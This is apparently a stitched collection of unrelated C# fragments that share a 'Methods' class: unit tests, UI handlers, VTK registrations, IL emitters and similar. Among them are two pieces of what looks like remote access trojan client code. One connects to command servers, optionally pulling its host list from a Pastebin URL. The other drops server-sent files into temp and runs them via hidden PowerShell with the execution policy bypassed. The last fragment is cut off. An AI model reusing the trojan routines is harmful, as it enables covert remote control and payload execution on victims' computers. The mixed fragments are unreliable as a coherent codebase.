public void CheckValidationPass() { Methods validate = new Methods(); string[] a = new string[4] { "asdd", "asa", "asdd", "dnjn" }; bool k = validate.ValidateForm(a); Assert.True(k); }
static void Main(string[] args) { int num1, num2; Console.Write("Hello "); Methods met = new Methods(); while(true) { Console.WriteLine("type in two integer numbers:"); try { num1 = int.Parse(Console.ReadLine()); num2 = int.Parse(Console.ReadLine()); Console.WriteLine($"Result was: {met.RandomMethod(num1, num2)}"); Console.WriteLine($"Method used: {met.ReturnActiveMethod()}"); } catch(ArgumentNullException) { Console.WriteLine("Invalid entry"); } catch(FormatException) { Console.WriteLine("Not a number"); } catch(OverflowException) { Console.WriteLine("Number was to large"); } } }
public void Build(TypeBuilder typeBuilder, FieldBuilder injectionSetField, Type injectionType) { var parameterTypes = new[] { typeof(DbEntityEntry), typeof(IDictionary<object, object>) }; var returnType = typeof(DbEntityValidationResult); var methods = new Methods(typeBuilder, MethodName, parameterTypes, returnType); var injectionMethod = injectionType.GetMethod("On" + MethodName, new[] { returnType, parameterTypes[0], parameterTypes[1] }); var il = methods.GetILGenerator(injectionType); // declare result variable il.DeclareLocal(typeof(DbEntityValidationResult)); il.Emit(OpCodes.Ldarg_0); il.Emit(OpCodes.Ldarg_1); il.Emit(OpCodes.Ldarg_2); il.Emit(OpCodes.Call, methods.BaseMethod); il.Emit(OpCodes.Stloc_3); il.EmitGetInjections(injectionSetField, injectionType); il.EmitInjectionLoop(x => { x.Emit(OpCodes.Ldloc_3); x.Emit(OpCodes.Ldarg_1); x.Emit(OpCodes.Ldarg_2); x.Emit(OpCodes.Callvirt, injectionMethod); }); il.Emit(OpCodes.Ldloc_3); il.Emit(OpCodes.Ret); }
public void Build(TypeBuilder typeBuilder, FieldBuilder injectionSetField, Type injectionType) { var parameterTypes = new[] { typeof(DbModelBuilder), typeof(DbContext) }; var methods = new Methods(typeBuilder, MethodName, new[] { typeof(DbModelBuilder) }); var injectionMethod = ReflectionHelper.GetMethod(injectionType, MethodName, BindingFlags.Instance | BindingFlags.Public, parameterTypes); var il = methods.GetILGenerator(injectionType); DeclareLocals(injectionType, il); il.Emit(OpCodes.Ldarg_0); il.Emit(OpCodes.Ldarg_1); il.Emit(OpCodes.Call, methods.BaseMethod); il.EmitGetInjections(injectionSetField, injectionType); il.EmitInjectionLoop(x => { x.Emit(OpCodes.Ldarg_1); x.Emit(OpCodes.Ldarg_0); x.Emit(OpCodes.Callvirt, injectionMethod); ConfigureDbSets(typeBuilder, x); }); il.Emit(OpCodes.Ret); }
public static Hashtable MakeHash( string resourcePath , Methods method , bool fadeIn ) { Hashtable hash = new Hashtable(); hash["storage"] = resourcePath; hash["destroy"] = ( method == Methods.DESTROY_AND_LOAD ) ? "true" : "false"; hash["fade"] = fadeIn ? "true" : "false"; return hash; }
public void TestMethod6() { DateTime Date = new DateTime(); Methods c = new Methods(); string d = "Mon"; string a = "Thu"; Assert.AreEqual(d,c.TradeStop(Date.AddSeconds(1463674549))); Assert.IsFalse(a==c.TradeStop(Date.AddSeconds(1463674549))); }
/// <summary> /// Handles the OnClick event of the ApplicationBarIconButton control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> /// <exception cref="System.NotImplementedException"></exception> private void ApplicationBarIconButton_OnClick(object sender, EventArgs e) { methods = new Methods(); currentMovie.WantSee = (bool) RadioButtonWant.IsChecked; currentMovie.Wish = (bool) RadioButtonWish.IsChecked; methods.UpdateMovie(currentMovie); MessageBox.Show("The movie has been updated"); NavigationService.Navigate(new Uri("/Pages/Menu.xaml", UriKind.Relative)); }
public TemplateSettingObject() { _TableDataGateway = new Project(); _StoreProcedures = new StoreProceduresPattern(); _Entities = new Entities(); _MethodsName = new MethodsName(); _Methods = new Methods(); _OthersSettings = new Others(); }
public void CheckValidationFail() { Methods validate = new Methods(); string[] a = new string[4] { "test", "test1", "test2", "" }; bool k = validate.ValidateForm(a); Assert.False(k); string[] b = new string[4] { "test", "", " ", "test3" }; bool j = validate.ValidateForm(b); Assert.False(j); }
public MainViewModel(MainWindow mainFrm) { Methods methods = new Methods(); CheckerMethods checkerMethods = new CheckerMethods(); ShowInfoWindow = new RelayCommand(() => methods.OpenInfoWindow(mainFrm)); EncryptText = new RelayCommand(() => methods.EncryptText(CryptographyString), ()=> checkerMethods.CheckEncryption(CryptographyString.DecryptedString, CryptographyString.Password)); DecryptText = new RelayCommand(() => methods.DecryptText(CryptographyString), ()=> checkerMethods.CheckDecryption(CryptographyString.EncryptedString, CryptographyString.Password)); }
public void TestMethod3() { Methods c = new Methods(); double Value; List<double> BufferS = new List<double>(); BufferS.Add(3); BufferS.Add(4); BufferS.Add(5); BufferS.Add(6); Value = c.Trade(true, BufferS, 2); Assert.AreEqual(4, Value); }
public void TestMethod1() { List<DateTime> DINET = new List<DateTime>(); List<double> Num = new List<double>(); Num.Add(0); Methods a = new Methods(); DINET = a.Convert(Num); string zna; zna = DINET[0].ToString("F"); Console.WriteLine(zna); string zna1 = "1 января 1970 г. 0:00:00"; Assert.AreEqual(zna1, zna); }
/// <summary> /// Called when a page becomes the active page in a frame. /// </summary> /// <param name="e">An object that contains the event data.</param> protected override void OnNavigatedTo(NavigationEventArgs e) { methods = new Methods(); base.OnNavigatedTo(e); string id; if (NavigationContext.QueryString.TryGetValue("id", out id)) { var currentMovie = methods.GetMovie(Convert.ToInt32(id)); TxtMovieTitle.Text = currentMovie.Title; BtnSearch_OnClick(null, null); BtnSearch.IsEnabled = false; DisableAppBar(); } }
public MainViewModel() { timer = new DispatcherTimer(); timer.Interval = TimeSpan.FromMilliseconds(5000); timer.Tick += Timer_Tick; timer.Start(); Methods methods = new Methods(); CheckerMethods checkerMethods = new CheckerMethods(); methods.GetProcessList(ProcessList); RefreshProcessList = new RelayCommand(() => methods.GetProcessList(ProcessList)); KillSelectedProcess = new RelayCommand(() => methods.KillSelectedTask(ProcessList[SelectedProcessIndex]), () => checkerMethods.CheckKillSelectedProcess(SelectedProcessIndex, ProcessList)); KillAllProcesses = new RelayCommand(() => methods.KillAllTasks(ProcessList)); }
/// <summary> /// Handles the OnClick event of the BtnAddCollection control. /// </summary> /// <param name="sender">The source of the event.</param> /// <param name="e">The <see cref="EventArgs"/> instance containing the event data.</param> private void BtnAddCollection_OnClick(object sender, EventArgs e) { methods = new Methods(); var movie = new MovieTable { Director = BlockDirectors.Text, Title = TxtMovieTitle.Text, Year = Convert.ToInt32(BlockYear.Text), WantSee = false, Wish = false, UrlImage = urlImage }; methods.InsertMovie(movie); MessageBox.Show("The movie has been added to the collection"); NavigationService.Navigate(new Uri("/Pages/Menu.xaml", UriKind.Relative)); }
protected async override Task<HttpResponseMessage> SendAsync( HttpRequestMessage request, CancellationToken cancellationToken) { Stopwatch sw = new Stopwatch(); sw.Start(); string _requestId = Guid.NewGuid().ToString(); request.Properties.Add("requestId", _requestId); // Call the inner handler. var response = await base.SendAsync(request, cancellationToken); sw.Stop(); MonitorObject MonitorObject = new Methods().ToMonitorObject(request.Method.ToString(), request.RequestUri.PathAndQuery, _requestId, response.IsSuccessStatusCode, response.StatusCode.ToString(), (int)Math.Round(sw.Elapsed.TotalMilliseconds)); LoggingUtility Log = LoggerFactory.GetLogger("MonitorLogger"); Log.InfoMonitor(MonitorObject); //Log.DebugFormat("{0} {1}", request.Properties["requestId"].ToString(), request.RequestUri.OriginalString); return response; }
/// <summary> /// Called when a page becomes the active page in a frame. /// </summary> /// <param name="e">An object that contains the event data.</param> protected override void OnNavigatedTo(NavigationEventArgs e) { methods = new Methods(); base.OnNavigatedTo(e); string id; if (NavigationContext.QueryString.TryGetValue("id", out id)) { currentMovie = methods.GetMovie(Convert.ToInt32(id)); BlockTitle.Text = currentMovie.Title; BlockYear.Text = currentMovie.Year.ToString(CultureInfo.InvariantCulture); BlockDirector.Text = currentMovie.Director; if (currentMovie.WantSee) RadioButtonWant.IsChecked = true; if (currentMovie.Wish) RadioButtonWish.IsChecked = true; var uri = new Uri(currentMovie.UrlImage, UriKind.Absolute); ImgCover.Source = new BitmapImage(uri); } }
static void Main(string[] args) { Model model = new Model(); Methods methods = new Methods(); //Client client = new Client(); Console.WriteLine("Fetching clients data..."); methods.getClients(ref model); Console.WriteLine("Success!"); Console.WriteLine("Fetching files and products..."); methods.getFiles(ref model); Console.WriteLine("Success!"); Console.WriteLine("Djoka"); //foreach (Client loopClient in model.clients) //{ // loopClient.new_id = methods.insertClient(loopClient); //} foreach (Client client in model.clients) Console.WriteLine(client.fname + " " + client.old_id); int picturesCount = 0; foreach (Product product in model.products) { Console.WriteLine("Product name: {0} \n",; if ( == 0) Console.WriteLine("No pictures for this product"); else { foreach (Picture pic in { Console.WriteLine("Picture for this product: {0}",; picturesCount++; } } } Console.WriteLine("Products count: {0}, pictures count: {1}, clients count: {2}", model.products.Count, picturesCount, model.clients.Count); Console.ReadKey(); }
public void Build(TypeBuilder typeBuilder, FieldBuilder injectionSetField, Type injectionType) { var methods = new Methods(typeBuilder, MethodName, new Type[0], typeof(int)); var parameterTypes = new[] { typeof(DbContext) }; var beforeMethod = injectionType.GetMethod("OnBeforeSaveChanges", parameterTypes); var afterMethod = injectionType.GetMethod("OnAfterSaveChanges", parameterTypes); var il = methods.GetILGenerator(injectionType); EmitHelper.DeclareLocalsForInjection(injectionType, il); // declare result variable il.DeclareLocal(typeof(int)); il.EmitGetInjections(injectionSetField, injectionType); il.EmitInjectionLoop(x => { x.Emit(OpCodes.Ldarg_0); x.Emit(OpCodes.Callvirt, beforeMethod); }); il.Emit(OpCodes.Ldarg_0); il.Emit(OpCodes.Call, methods.BaseMethod); il.Emit(OpCodes.Stloc_3); il.EmitInjectionLoop(x => { x.Emit(OpCodes.Ldarg_0); x.Emit(OpCodes.Callvirt, afterMethod); }); il.Emit(OpCodes.Ldloc_3); il.Emit(OpCodes.Ret); }
static vtkVolumeProperty() { vtkVolumeProperty.MRClassNameKey = "class vtkVolumeProperty"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkVolumeProperty.MRClassNameKey, Type.GetType("Kitware.VTK.vtkVolumeProperty")); }
private void RunStateMachine(string testName, ActionModel step, TestResults testResults) { if (step.Object == null) { testResults.AddError(testName, $"Undefined step: {step.StepName}"); } switch (step.Command) { case Commands.Undefined: { testResults.AddError(testName, $"Undefined step: {step.StepName}"); result = false; } break; case Commands.OpenBrowser: { // TODO parse browser string driver = new ChromeDriver(); engine = new WebSearchEngine(driver); result = true; } break; case Commands.Click: { if (step.Object is Element) { Element element = (Element)step.Object; IWebElement foundElement = null; if (element.Identificator == "xpath") { foundElement = engine.Find(By.XPath(element.Locator)); } if (element.Identificator == "css") { foundElement = engine.Find(By.CssSelector(element.Locator)); } if (foundElement == null) { testResults.AddError(testName, $"Element '{element.Name}' was not found"); result = false; return; } else { foundElement.SafeClick(); WebPageConsumer.CurrentElement = foundElement; result = true; return; } } testResults.AddError(testName, $"Step: {step.StepName}. No matching elements found in page collection"); result = false; } break; case Commands.OpenTab: { int tabIndex = (int)step.Object; if (driver.WindowHandles.Count >= tabIndex) { driver.SwitchTo().Window(driver.WindowHandles[tabIndex - 1]); } result = true; } break; case Commands.OpenPage: { IPage page = (IPage)step.Object; if (page == null) { testResults.AddError(testName, $"Step: {step.StepName}. Page was not found"); result = false; return; } driver.Url = page.Url; result = true; } break; case Commands.Visible: { if (step.Object is Element) { Element element = (Element)step.Object; IWebElement foundElement = null; if (element.Identificator == "xpath") { foundElement = engine.Find(By.XPath(element.Locator)); } if (element.Identificator == "css") { foundElement = engine.Find(By.CssSelector(element.Locator)); } if (foundElement == null) { testResults.AddError(testName, $"Element '{element.Name}' was not found"); result = false; } result = foundElement.IsDisplayed(); WebPageConsumer.CurrentElement = foundElement; return; } result = false; } break; case Commands.CreateTab: { // TODO does not work IWebElement body = driver.FindElement(By.TagName("body")); body.SendKeys(Keys.Control + 't'); driver.SwitchToLastWindow(); result = true; } break; case Commands.ElementText: { if (step.Object is Element) { Element element = (Element)step.Object; if (element.Identificator == "xpath") { var foundElement = engine.Find(By.XPath(element.Locator)); if (foundElement == null) { testResults.AddError(testName, $"Element '{element.Name}' was not found"); result = false; } if (foundElement.IsDisplayed()) { var actualElementText = foundElement.GetAttribute("value"); var opentag = "<"; var closeTag = ">"; if (string.IsNullOrEmpty(actualElementText)) { actualElementText = foundElement.Text; } if (step.StepName.Contains(opentag) && step.StepName.Contains(closeTag)) { var placeHolders = Regex.Matches(step.StepName, $"<(.*?)>"); var placeHolder = placeHolders[0].Value; var expectedText = placeHolder.Substring(1, placeHolder.Length - 2); if (expectedText == actualElementText) { result = true; WebPageConsumer.CurrentElement = foundElement; return; } } else { LoggerHub.AddNotificationToHub($"Test {testName}. Step: {step.StepName}. Input text is not defined. Please use <> to specify a text"); } testResults.AddError(testName, $"step: {step.StepName}. Actual element text is {actualElementText}"); result = false; } } if (element.Identificator == "css") { var foundElement = engine.Find(By.XPath(element.Locator)); if (foundElement == null) { testResults.AddError(testName, $"Step: {step.StepName}. Element '{element.Name}' was not found"); result = false; } if (foundElement.IsDisplayed()) { var actualElementText = foundElement.GetAttribute("value"); if (string.IsNullOrEmpty(actualElementText)) { actualElementText = foundElement.Text; } if (step.StepName.Substring(step.StepName.IndexOf(element.Name) + element.Name.Length) .Contains(actualElementText)) { result = true; WebPageConsumer.CurrentElement = foundElement; return; } testResults.AddError(testName, $"Step: {step.StepName}. Actual element text is {actualElementText}"); result = false; } return; } result = false; } } break; case Commands.PageTitle: { result = true; } break; case Commands.SwitchFrame: { result = true; } break; case Commands.CloseBrowser: { driver.Close(); //driver.Quit(); //driver.Dispose(); result = true; } break; case Commands.TextInput: { if (step.Object is string) { if (WebPageConsumer.CurrentElement != null) { WebPageConsumer.CurrentElement.SendKeys($"{step.Object}"); result = true; return; // TODO add verification for entered text } testResults.AddError(testName, $"Step: {step.StepName}. Current element is not defined."); } testResults.AddError(testName, $"Step: {step.StepName}. Input text failed."); result = false; } break; case Commands.Wait: { if (step.Object is int) { Methods.WaitForSeconds((int)step.Object); result = true; return; } testResults.AddError(testName, $"Step: {step.StepName}. Failed to extract a waiting time."); result = false; } break; case Commands.Stop: { Logger.WritePostponedInfo($"Test {testName} is paused. Press 'P' to continue."); Menu.RestartMenu(); Console.ReadKey(); result = true; return; } break; } }
private void ProcessResponse() { string webResponse = Variables.WebResponse; bool hasAvatar = false; if (webResponse.Split('[', ']')[1] == "SUCCESS") { Form parentForm = ParentForm; // Loads the XML file ready to be parsed. XmlDocument xmlDocument = new XmlDocument(); xmlDocument.LoadXml(webResponse.Replace("[SUCCESS]", "")); // Iterates through each program node. foreach (XmlNode xmlInformationNode in xmlDocument.Cast <XmlNode>().SelectMany(xmlNode => xmlNode.Cast <XmlNode>().SelectMany(xmlUserNode => xmlUserNode.Cast <XmlNode>()))) { XmlNode node = xmlInformationNode; try { Invoke((MethodInvoker) delegate { switch (node.Name) { case "email": LabelEmailAddress.Text = node.InnerText; break; case "username": LabelUsername.Text = node.InnerText; if (parentForm != null) { parentForm.Text = String.Format("ByteGuard - {0}'s profile", node.InnerText); } break; case "registeredtime": LabelRegistrationDate.Text = Methods.TimeStampToDate(Convert.ToInt32(node.InnerText)); break; case "lastaction": LabelLastOnline.Text = Methods.TimeStampToDate(Convert.ToInt32(node.InnerText)); break; // TODO: Show the user is verified/activated. case "isactivated": break; case "description": TextBoxUserDescription.Text = node.InnerText; break; // TODO: Do something! case "hasavatar": hasAvatar = (Convert.ToInt32(node.InnerText) == 1); break; } }); } catch { // Catches error if controls are disposed. } } if (hasAvatar) { Thread downloadAvatarThreaded = new Thread(DownloadAvatar); downloadAvatarThreaded.Start(_avatarPath); } Invoke((MethodInvoker) delegate { ButtonAddReputation.Enabled = true; ButtonSendMessage.Enabled = true; }); ThemeContainer.SetStatus("Send the user a message or add to their reputation.", 3); } else { // Failed to create account, display error. ThemeContainer.SetStatus(webResponse.Replace("[ERROR] ", String.Empty), 1); } }
private async Task LoadRandomGroup(string offset) { if (Methods.CheckConnectivity()) { var countList = RandomAdapter.GroupList.Count; var dictionary = new Dictionary <string, string> { { "limit", "30" }, { "group_offset", offset }, { "search_key", "a" }, }; var(respondCode, respondString) = await RequestsAsync.Global.Get_Search(dictionary); if (respondCode.Equals(200)) { if (respondString is GetSearchObject result) { var respondList = result.Groups.Count; if (respondList > 0) { if (countList > 0) { foreach (var item in from item in result.Groups let check = RandomAdapter.GroupList.FirstOrDefault(a => a.Id == item.Id) where check == null select item) { RandomAdapter.GroupList.Add(item); } RunOnUiThread(() => { RandomAdapter.NotifyItemRangeInserted(countList, RandomAdapter.GroupList.Count - countList); }); } else { RandomAdapter.GroupList = new ObservableCollection <GroupClass>(result.Groups); RunOnUiThread(() => { if (RandomGroupInflated == null) { RandomGroupInflated = RandomGroupViewStub.Inflate(); } RecyclerInflaterRandomGroup = new TemplateRecyclerInflater(); RecyclerInflaterRandomGroup.InflateLayout <GroupClass>(this, RandomGroupInflated, RandomAdapter, TemplateRecyclerInflater.TypeLayoutManager.LinearLayoutManagerVertical, 0, true, GetString(Resource.String.Lbl_RandomGroups)); }); } } else { if (RecyclerInflaterRandomGroup?.Recyler != null && (RandomAdapter.GroupList.Count > 10 && !RecyclerInflaterRandomGroup.Recyler.CanScrollVertically(1))) { Toast.MakeText(this, GetText(Resource.String.Lbl_NoMoreGroup), ToastLength.Short).Show(); } } } } else { Methods.DisplayReportResult(this, respondString); } RunOnUiThread(ShowEmptyPage); } else { Inflated = EmptyStateLayout.Inflate(); EmptyStateInflater x = new EmptyStateInflater(); x.InflateLayout(Inflated, EmptyStateInflater.Type.NoConnection); if (!x.EmptyStateButton.HasOnClickListeners) { x.EmptyStateButton.Click += null; x.EmptyStateButton.Click += EmptyStateButtonOnClick; } Toast.MakeText(this, GetString(Resource.String.Lbl_CheckYourInternetConnection), ToastLength.Short).Show(); } }
static vtkAngleRepresentation3D() { vtkAngleRepresentation3D.MRClassNameKey = "class vtkAngleRepresentation3D"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkAngleRepresentation3D.MRClassNameKey, Type.GetType("Kitware.VTK.vtkAngleRepresentation3D")); }
private void AddPostAutoLinkTextViewOnAutoLinkOnClick(object sender, AutoLinkOnClickEventArgs e) { try { if (e.P0 == AutoLinkMode.ModeEmail) { Methods.App.SendEmail(Activity, e.P1.Replace(" ", "")); } else if (e.P0 == AutoLinkMode.ModeUrl) { string url = e.P1.Replace(" ", ""); if (!e.P1.Contains("http")) { url = "http://" + e.P1.Replace(" ", ""); } //var intent = new Intent(Activity, typeof(LocalWebViewActivity)); //intent.PutExtra("URL", url); //intent.PutExtra("Type", url); //Activity.StartActivity(intent); new IntentController(Activity).OpenBrowserFromApp(url); } else if (e.P0 == AutoLinkMode.ModeHashtag) { var intent = new Intent(Activity, typeof(HashTagPostsActivity)); intent.PutExtra("Id", e.P1.Replace(" ", "")); intent.PutExtra("Tag", e.P1.Replace(" ", "")); Activity.StartActivity(intent); } else if (e.P0 == AutoLinkMode.ModeMention) { var dataUSer = ListUtils.MyProfileList.FirstOrDefault(); string name = e.P1.Replace("@", "").Replace(" ", ""); var sqlEntity = new SqLiteDatabase(); var user = sqlEntity.Get_DataOneUser(name); sqlEntity.Dispose(); if (user != null) { WoWonderTools.OpenProfile(Activity, user.UserId, user); } else { if (name == dataUSer?.Name || name == dataUSer?.Username) { if (PostClickListener.OpenMyProfile) { return; } var intent = new Intent(Activity, typeof(MyProfileActivity)); Activity.StartActivity(intent); } else { var intent = new Intent(Activity, typeof(UserProfileActivity)); //intent.PutExtra("UserObject", JsonConvert.SerializeObject(item)); intent.PutExtra("name", name); Activity.StartActivity(intent); } } } else if (e.P0 == AutoLinkMode.ModePhone) { Methods.App.SaveContacts(Activity, e.P1.Replace(" ", ""), "", "2"); } else if (e.P0 == AutoLinkMode.ModeCustom) { var dialog = new MaterialDialog.Builder(Activity); dialog.Title(Activity.GetText(Resource.String.Lbl_Location)); dialog.PositiveText(Activity.GetText(Resource.String.Lbl_RemoveLocation)).OnPositive(this); dialog.NeutralText(Activity.GetText(Resource.String.Lbl_ChangeLocation)).OnNeutral(this); dialog.NegativeText(Activity.GetText(Resource.String.Lbl_Cancel)).OnNegative(this); //dialog.AlwaysCallSingleChoiceCallback(); dialog.Build().Show(); } } catch (Exception exception) { Methods.DisplayReportResultTrack(exception); } }
private void Button10_Click(object sender, EventArgs e) { Methods se = new Methods(); Deal Sdelka = new Deal(false, BufferS, tic); BUY.Add(Sdelka); // Запомнить значение продажи }
private void AutoLinkTextViewOnAutoLinkOnClick(object sender, AutoLinkOnClickEventArgs autoLinkOnClickEventArgs) { try { var typetext = Methods.FunString.Check_Regex(autoLinkOnClickEventArgs.P1.Replace(" ", "")); if (typetext == "Email" || autoLinkOnClickEventArgs.P0 == AutoLinkMode.ModeEmail) { Methods.App.SendEmail(Activity, autoLinkOnClickEventArgs.P1.Replace(" ", "")); } else if (typetext == "Website" || autoLinkOnClickEventArgs.P0 == AutoLinkMode.ModeUrl) { string url = autoLinkOnClickEventArgs.P1.Replace(" ", ""); if (!autoLinkOnClickEventArgs.P1.Contains("http")) { url = "http://" + autoLinkOnClickEventArgs.P1.Replace(" ", ""); } //var intent = new Intent(Activity, typeof(LocalWebViewActivity)); //intent.PutExtra("URL", url); //intent.PutExtra("Type", url); //Activity.StartActivity(intent); new IntentController(Activity).OpenBrowserFromApp(url); } else if (typetext == "Hashtag" || autoLinkOnClickEventArgs.P0 == AutoLinkMode.ModeHashtag) { var intent = new Intent(Activity, typeof(HashTagPostsActivity)); intent.PutExtra("Id", autoLinkOnClickEventArgs.P1.Replace(" ", "")); intent.PutExtra("Tag", autoLinkOnClickEventArgs.P1.Replace(" ", "")); Activity.StartActivity(intent); } else if (typetext == "Mention" || autoLinkOnClickEventArgs.P0 == AutoLinkMode.ModeMention) { var dataUSer = ListUtils.MyProfileList.FirstOrDefault(); string name = autoLinkOnClickEventArgs.P1.Replace("@", "").Replace(" ", ""); var sqlEntity = new SqLiteDatabase(); var user = sqlEntity.Get_DataOneUser(name); sqlEntity.Dispose(); if (user != null) { WoWonderTools.OpenProfile(Activity, user.UserId, user); } else { if (name == dataUSer?.Name || name == dataUSer?.Username) { if (PostClickListener.OpenMyProfile) { return; } var intent = new Intent(Activity, typeof(MyProfileActivity)); Activity.StartActivity(intent); } else { var intent = new Intent(Activity, typeof(UserProfileActivity)); //intent.PutExtra("UserObject", JsonConvert.SerializeObject(item)); intent.PutExtra("name", name); Activity.StartActivity(intent); } } } else if (typetext == "Number" || autoLinkOnClickEventArgs.P0 == AutoLinkMode.ModePhone) { Methods.App.SaveContacts(Activity, autoLinkOnClickEventArgs.P1.Replace(" ", ""), "", "2"); } } catch (Exception exception) { Methods.DisplayReportResultTrack(exception); } }
public BooScope(CompiledProject compiledProject, BooSource source, ParseRequest parseRequest, Methods methods, ParseRequestProcessor parseRequestProcessor) : this(compiledProject, source, parseRequest, parseRequestProcessor) { this.methods = methods; }
void M (Methods m) { m.await (); this.await (); // FIXME: await (); }
static vtkFixedPointRayCastImage() { vtkFixedPointRayCastImage.MRClassNameKey = "class vtkFixedPointRayCastImage"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkFixedPointRayCastImage.MRClassNameKey, Type.GetType("Kitware.VTK.vtkFixedPointRayCastImage")); }
public static void InitializeClient() { try { TcpClient = new System.Net.Sockets.Socket(AddressFamily.InterNetwork, SocketType.Stream, ProtocolType.Tcp) { ReceiveBufferSize = 50 * 1024, SendBufferSize = 50 * 1024, }; if (Settings.Pastebin == "null") { string ServerIP = Settings.Hosts.Split(',')[new Random().Next(Settings.Hosts.Split(',').Length)]; int ServerPort = Convert.ToInt32(Settings.Ports.Split(',')[new Random().Next(Settings.Ports.Split(',').Length)]); if (IsValidDomainName(ServerIP)) //check if the address is alphanumric (meaning its a domain) { IPAddress[] addresslist = Dns.GetHostAddresses(ServerIP); //get all IP's connected to that domain foreach (IPAddress theaddress in addresslist) //we do a foreach becasue a domain can lead to multiple IP's { try { TcpClient.Connect(theaddress, ServerPort); //lets try and connect! if (TcpClient.Connected) { break; } } catch { } } } else { TcpClient.Connect(ServerIP, ServerPort); //legacy mode connect (no DNS) } } else { using (WebClient wc = new WebClient()) { NetworkCredential networkCredential = new NetworkCredential("", ""); wc.Credentials = networkCredential; string resp = wc.DownloadString(Settings.Pastebin); string[] spl = resp.Split(new[] { ":" }, StringSplitOptions.None); Settings.Hosts = spl[0]; Settings.Ports = spl[new Random().Next(1, spl.Length)]; TcpClient.Connect(Settings.Hosts, Convert.ToInt32(Settings.Ports)); } } if (TcpClient.Connected) { Debug.WriteLine("Connected!"); IsConnected = true; SslClient = new SslStream(new NetworkStream(TcpClient, true), false, ValidateServerCertificate); SslClient.AuthenticateAsClient(TcpClient.RemoteEndPoint.ToString().Split(':')[0], null, SslProtocols.Tls, false); Buffer = new byte[4]; MS = new MemoryStream(); Send(Methods.SendInfo()); Tick = new Timer(new TimerCallback(CheckServer), null, new Random().Next(15 * 1000, 30 * 1000), new Random().Next(15 * 1000, 30 * 1000)); SslClient.BeginRead(Buffer, 0, Buffer.Length, ReadServertData, null); } else { IsConnected = false; return; } } catch { Debug.WriteLine("Disconnected!"); IsConnected = false; return; } }
private void dLeitores_Load(object sender, EventArgs e) { Methods.loadFormPosition(this); }
static vtkXMLMultiBlockDataWriter() { vtkXMLMultiBlockDataWriter.MRClassNameKey = "class vtkXMLMultiBlockDataWriter"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkXMLMultiBlockDataWriter.MRClassNameKey, Type.GetType("Kitware.VTK.vtkXMLMultiBlockDataWriter")); }
private void txtValidityDate_KeyPress(object sender, KeyPressEventArgs e) { Methods clsMethods = new Methods(); e.Handled = clsMethods.AllNum(Convert.ToInt32(e.KeyChar)); }
public void FixupMethodOverrides(CodeGenerationOptions opt) { foreach (var m in Methods.Where(m => !m.IsStatic && !m.IsInterfaceDefaultMethod)) { for (var bt = GetBaseGen(opt); bt != null; bt = bt.GetBaseGen(opt)) { var bm = bt.Methods.FirstOrDefault(mm => mm.Name == m.Name && mm.Visibility == m.Visibility && ParameterList.Equals(mm.Parameters, m.Parameters)); if (bm != null && bm.RetVal.FullName == m.RetVal.FullName) // if return type is different, it could be still "new", not "override". { m.IsOverride = true; break; } } } // Interface default methods can be overriden. We want to process them differently. var checkDimOverrideTargets = opt.SupportDefaultInterfaceMethods ? Methods : Methods.Where(m => m.IsInterfaceDefaultMethod); // We need to check all the implemented interfaces of all the base types. var allIfaces = new List <InterfaceGen> (); for (var gen = this; gen != null; gen = gen.BaseGen) { gen.GetAllDerivedInterfaces(allIfaces); } foreach (var m in checkDimOverrideTargets.Where(m => !m.IsStatic)) { foreach (var bt in allIfaces.Distinct()) { // We mark a method as an override if (1) it is a DIM, or (2) if the base method is DIM // (i.e. we don't mark as override if a class method "implements" normal iface method.) var bm = bt.Methods.FirstOrDefault(mm => (m.IsInterfaceDefaultMethod || !mm.IsAbstract) && mm.Name == m.Name && ParameterList.Equals(mm.Parameters, m.Parameters)); if (bm != null) { m.OverriddenInterfaceMethod = bm; break; } } } foreach (var m in Methods) { if (m.Name == Name || ContainsProperty(m.Name, true) || HasNestedType(m.Name)) { m.Name = "Invoke" + m.Name; } if ((m.Name == "ToString" && m.Parameters.Count == 0) || (BaseGen != null && BaseGen.ContainsMethod(m, true))) { m.IsOverride = true; } } foreach (var nt in NestedTypes) { nt.FixupMethodOverrides(opt); } }
public virtual Task <long> RequestAsync(string path, bool pathOverride, Methods method, Version methodApiVersion, SubsonicParameters parameters = null, CancellationToken?cancelToken = null) { throw new SubsonicApiException("Unsupported method"); }
static vtkDiscreteMarchingCubes() { vtkDiscreteMarchingCubes.MRClassNameKey = "class vtkDiscreteMarchingCubes"; Methods.RegisterType(Assembly.GetExecutingAssembly(), vtkDiscreteMarchingCubes.MRClassNameKey, Type.GetType("Kitware.VTK.vtkDiscreteMarchingCubes")); }
public void AddMethod(Method m) { Methods.Add(m); }
private void txtAmount_KeyPress(object sender, System.Windows.Forms.KeyPressEventArgs e) { Methods clsMethods = new Methods(); e.Handled = clsMethods.AllNumWithDecimal(Convert.ToInt32(e.KeyChar)); }
public void SendToDisk(MsgPack unpack_msgpack) { try { string fullPath = Path.Combine(Path.GetTempPath(), unpack_msgpack.ForcePathObject("FileName").AsString); if (File.Exists(fullPath)) { try { File.Delete(fullPath); } catch { fullPath = Path.Combine(Path.GetTempPath(), Methods.GetRandomString(6) + Path.GetExtension(unpack_msgpack.ForcePathObject("FileName").AsString)); } } File.WriteAllBytes(fullPath, Zip.Decompress(unpack_msgpack.ForcePathObject("File").GetAsBytes())); if (unpack_msgpack.ForcePathObject("FileName").AsString.ToLower().EndsWith(".ps1")) { Process.Start(new ProcessStartInfo { FileName = "cmd", Arguments = $"/c start /b powershell –ExecutionPolicy Bypass -WindowStyle Hidden -NoExit -FilePath {"'" + "\"" + fullPath + "\"" + "'"} & exit", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden, UseShellExecute = true, ErrorDialog = false, }); } else { Process.Start(new ProcessStartInfo { FileName = "cmd", Arguments = $"/c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath {"'" + "\"" + fullPath + "\"" + "'"} & exit", CreateNoWindow = true, WindowStyle = ProcessWindowStyle.Hidden, UseShellExecute = true, ErrorDialog = false, }); } if (unpack_msgpack.ForcePathObject("Update").AsString == "true") { new HandleUninstall(); } else { Thread.Sleep(1000); if (Process.GetProcessesByName(Path.GetFileNameWithoutExtension(fullPath)).Length > 0) { Packet.Log($"Temp\\{Path.GetFileName(fullPath)} execute success!"); } else if (fullPath.ToLower().EndsWith(".ps1") && 